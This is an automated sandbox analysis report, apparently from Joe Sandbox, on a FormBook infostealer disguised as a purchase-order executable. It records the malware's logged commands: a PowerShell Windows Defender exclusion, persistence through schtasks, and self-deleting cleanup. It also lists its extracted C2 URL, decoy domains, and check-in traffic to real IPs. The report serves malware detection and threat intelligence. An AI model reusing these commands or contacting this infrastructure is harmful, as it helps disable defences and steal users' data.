
Windows Analysis Report
Orden de compra 0307AR24.exe

Overview

General Information

Sample name: Orden de compra 0307AR24.exe
Analysis ID: 1467133
MD5: 7bb0f568ce14d2350c704aea2c4bc9de
SHA1: 3c6cc8de9a66613ce41f37cf1fd22990e80ce725
SHA256: eaffc7cc6da06f5894642bb88fff4a0186cf61100558af3cb552145f86d8e041
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Orden de compra 0307AR24.exe (PID: 2572 cmdline: "C:\Users\user\Desktop\Orden de compra 0307AR24.exe" MD5: 7BB0F568CE14D2350C704AEA2C4BC9DE)
    • powershell.exe (PID: 4416 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7380 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 760 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7232 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autoconv.exe (PID: 7500 cmdline: "C:\Windows\SysWOW64\autoconv.exe" MD5: A705C2ACED7DDB71AFB87C4ED384BED6)
        • systray.exe (PID: 7508 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
          • cmd.exe (PID: 7640 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rundll32.exe (PID: 7796 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • RggSaCWUvAyNK.exe (PID: 7360 cmdline: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe MD5: 7BB0F568CE14D2350C704AEA2C4BC9DE)
    • schtasks.exe (PID: 7540 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7584 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Source / Rule / Description / Author / Strings
Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
    Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
      Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
      Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source / Rule / Description / Author / Strings
      Source: 9.2.RegSvcs.exe.400000.0.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
        Source: 9.2.RegSvcs.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
          Source: 9.2.RegSvcs.exe.400000.0.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
          Source: 9.2.RegSvcs.exe.400000.0.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.RegSvcs.exe.400000.0.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group

          System Summary

          Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ParentImage: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, ParentProcessId: 2572, ParentProcessName: Orden de compra 0307AR24.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ProcessId: 4416, ProcessName: powershell.exe
          Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4004, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 7796, ProcessName: rundll32.exe
          Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe, ParentImage: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe, ParentProcessId: 7360, ParentProcessName: RggSaCWUvAyNK.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp", ProcessId: 7540, ProcessName: schtasks.exe
          Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ParentImage: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, ParentProcessId: 2572, ParentProcessName: Orden de compra 0307AR24.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp", ProcessId: 760, ProcessName: schtasks.exe
          Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ParentImage: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, ParentProcessId: 2572, ParentProcessName: Orden de compra 0307AR24.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ProcessId: 4416, ProcessName: powershell.exe

          Persistence and Installation Behavior

          Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ParentImage: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, ParentProcessId: 2572, ParentProcessName: Orden de compra 0307AR24.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp", ProcessId: 760, ProcessName: schtasks.exe
          Snort alerts (Timestamp, SID, Source Port, Destination Port, Protocol, Classtype):
          Timestamp: 07/03/24-18:33:16.719137, SID: 2031412, Source Port: 49729, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-18:32:36.955975, SID: 2031412, Source Port: 49724, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-18:35:19.798968, SID: 2031412, Source Port: 49737, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-18:36:23.287483, SID: 2031412, Source Port: 49741, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-18:36:00.832032, SID: 2031412, Source Port: 49740, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-18:33:37.796874, SID: 2031412, Source Port: 49732, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-18:34:18.302843, SID: 2031412, Source Port: 49734, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-18:35:40.453540, SID: 2031412, Source Port: 49739, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-18:34:59.312116, SID: 2031412, Source Port: 49736, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected


          AV Detection

          Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.upcyclecharms.com/md02/"], "decoy": ["onsen1508.com", "partymaxclubmen36.click", "texasshelvingwarehouse.com", "tiantiying.com", "taxcredits-pr.com", "33mgbet.com", "equipoleiremnacional.com", "andrewghita.com", "zbbnp.xyz", "englandbreaking.com", "a1b5v.xyz", "vizamag.com", "h0lg3.rest", "ux-design-courses-17184.bond", "of84.top", "qqkartel88v1.com", "avalynkate.com", "cpuk-finance.com", "yeslabs.xyz", "webuyandsellpa.com", "barnesassetrecovery.store", "hecxion.xyz", "theopencomputeproject.net", "breezyvw.christmas", "mumazyl.com", "woby.xyz", "jalaios10.vip", "lynxpire.com", "sparkbpo.com", "333689z.com", "rslotrank.win", "adscendmfmarketing.com", "detroitreels.com", "xojiliv1.com", "mzhhxxff.xyz", "hitcomply.com", "piedge-taiko.net", "chiri.lat", "bookmygaddi.com", "hjemfinesse.shop", "zruypj169g.top", "solarfundis.com", "pittsparking.com", "teplo-invest.com", "j3k7n.xyz", "coloradoskinwellness.com", "z8ggd.com", "coinbureau.xyz", "mamasprinkleofjoy.com", "xotj7a.xyz", "nijssenadventures.com", "ysa-cn.com", "tigajco69.fun", "localhomeservicesadvisor.com", "attorney-services-8344642.zone", "rnwaifu.xyz", "nyverian.com", "family-lawyers-7009103.world", "117myw.com", "kingdom66.lat", "tdshomesolution.com", "momof2filiricans.com", "saeutah.com", "rakring.com"]}
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe, ReversingLabs: Detection: 26%
          Source: Orden de compra 0307AR24.exe, ReversingLabs: Detection: 26%
          Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe, Joe Sandbox ML: detected
          Source: Orden de compra 0307AR24.exe, Joe Sandbox ML: detected
          Source: Orden de compra 0307AR24.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Orden de compra 0307AR24.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: systray.pdb source: RegSvcs.exe, 00000009.00000002.2215867045.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2215792659.0000000001390000.00000040.10000000.00040000.00000000.sdmp, systray.exe, systray.exe, 0000000E.00000002.4548836060.0000000000210000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2215867045.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2215792659.0000000001390000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4548836060.0000000000210000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 0000000A.00000002.4559537776.0000000010EBF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4550643558.000000000507F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4549290309.0000000002C47000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000E.00000003.2215786953.00000000047D5000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000E.00000003.2217606018.0000000004987000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004CCE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2316492192.0000000004347000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.00000000046A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2319355530.00000000044FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.000000000483E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 0000000E.00000003.2215786953.00000000047D5000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000E.00000003.2217606018.0000000004987000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004CCE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2316492192.0000000004347000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.00000000046A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2319355530.00000000044FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.000000000483E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: RegSvcs.exe, 00000011.00000002.2317311664.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2322712335.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000015.00000002.2320740749.00000000000B0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000011.00000002.2317311664.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2322712335.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000015.00000002.2320740749.00000000000B0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 0000000A.00000002.4559537776.0000000010EBF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4550643558.000000000507F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4549290309.0000000002C47000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\NULL
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, Code function: 4x nop then jmp 04E2DE3Ah, 0_2_04E2D53C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4x nop then pop esi, 9_2_0041731B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4x nop then pop ebx, 9_2_00407B20
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe, Code function: 4x nop then jmp 04B3D38Ah, 11_2_04B3CA8C
          Source: C:\Windows\SysWOW64\systray.exe, Code function: 4x nop then pop esi, 14_2_029E731B
          Source: C:\Windows\SysWOW64\systray.exe, Code function: 4x nop then pop ebx, 14_2_029D7B22

          Networking

          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49724 -> 185.53.179.92:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49729 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49732 -> 203.196.8.7:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49734 -> 15.197.142.173:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49736 -> 192.250.227.27:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49737 -> 3.33.130.190:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49739 -> 104.18.187.223:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49740 -> 198.185.159.144:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 54.67.42.145:80
          Source: C:\Windows\explorer.exe | Network Connect: 185.53.179.92 80
          Source: C:\Windows\explorer.exe | Network Connect: 198.185.159.144 80
          Source: Malware configuration extractor | URLs: www.upcyclecharms.com/md02/
          Source: DNS query: www.mzhhxxff.xyz
          Source: DNS query: www.a1b5v.xyz
          Source: global traffic | HTTP traffic detected: GET /md02/?TPXh=O2vdgLwRhMAgOHoS701s4xS4xJeZ/+uwNgHwz2yOIOwCqMZJzZYnLthi8nNL68HJ3+dRBVTqOQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1 | Host: www.ux-design-courses-17184.bond | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /md02/?TPXh=50vPMniPucPBFAoGypRNvn+9klri27h0dApk4meYCliplUm/ww094FdaSsyOnJ5jMG3DM+yUOg==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1 | Host: www.coloradoskinwellness.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /md02/?TPXh=4AwpHqQNViPAc6H2SH6W32NBDbh/yf/Y2D8hgqFIHxnXsLrA8hdQjo1iXHj4HnJ/ZqvHoeNZWw==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1 | Host: www.tiantiying.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /md02/?TPXh=TC5sRGY/d0WrdY74L9um5PW4cqP23O9TC/qUYRxTqxu6QMwh8ii9j/dDz35GSdofbeImGevgjQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1 | Host: www.theopencomputeproject.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /md02/?TPXh=Cq7+/Ky+K6vI68NpDrm1YJYa3GKRdZGNexOywzaDimkbuuqps0atd8BONpkLeDzS4/cRTt0qqA==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1 | Host: www.equipoleiremnacional.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /md02/?TPXh=M1D20hrtEA0YXOf/HK2sZrZVDkFjWbXD84BuCtYvxk7BtbkSICST3Apq92N7VT2icGdL8Ejrhw==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1 | Host: www.detroitreels.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /md02/?TPXh=Huvb14v0kOWfNfmpMWoBgNUO4U2JwQZ3Rl/9gDSI5Y6jcOUTIOoj4XqjJyszJ9ZVOt8xpVdhjQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1 | Host: www.upcyclecharms.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View | IP Address: 198.185.159.144
          Source: Joe Sandbox View | IP Address: 185.53.179.92
          Source: Joe Sandbox View | ASN Name: CNSV-LLCUS
          Source: Joe Sandbox View | ASN Name: SQUARESPACEUS
          Source: Joe Sandbox View | ASN Name: TEAMINTERNET-ASDE
          Source: Joe Sandbox View | ASN Name: CHINATELECOM-CORE-WAN-CN2ChinaTelecomNextGenerationCarr
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exe | Code function: 10_2_10474F82 getaddrinfo,setsockopt,recv
          Source: global traffic | DNS traffic detected: DNS query: www.ux-design-courses-17184.bond
          Source: global traffic | DNS traffic detected: DNS query: www.mzhhxxff.xyz
          Source: global traffic | DNS traffic detected: DNS query: www.coloradoskinwellness.com
          Source: global traffic | DNS traffic detected: DNS query: www.tiantiying.com
          Source: global traffic | DNS traffic detected: DNS query: www.theopencomputeproject.net
          Source: global traffic | DNS traffic detected: DNS query: www.z8ggd.com
          Source: global traffic | DNS traffic detected: DNS query: www.equipoleiremnacional.com
          Source: global traffic | DNS traffic detected: DNS query: www.detroitreels.com
          Source: global traffic | DNS traffic detected: DNS query: www.family-lawyers-7009103.world
          Source: global traffic | DNS traffic detected: DNS query: www.upcyclecharms.com
          Source: global traffic | DNS traffic detected: DNS query: www.a1b5v.xyz
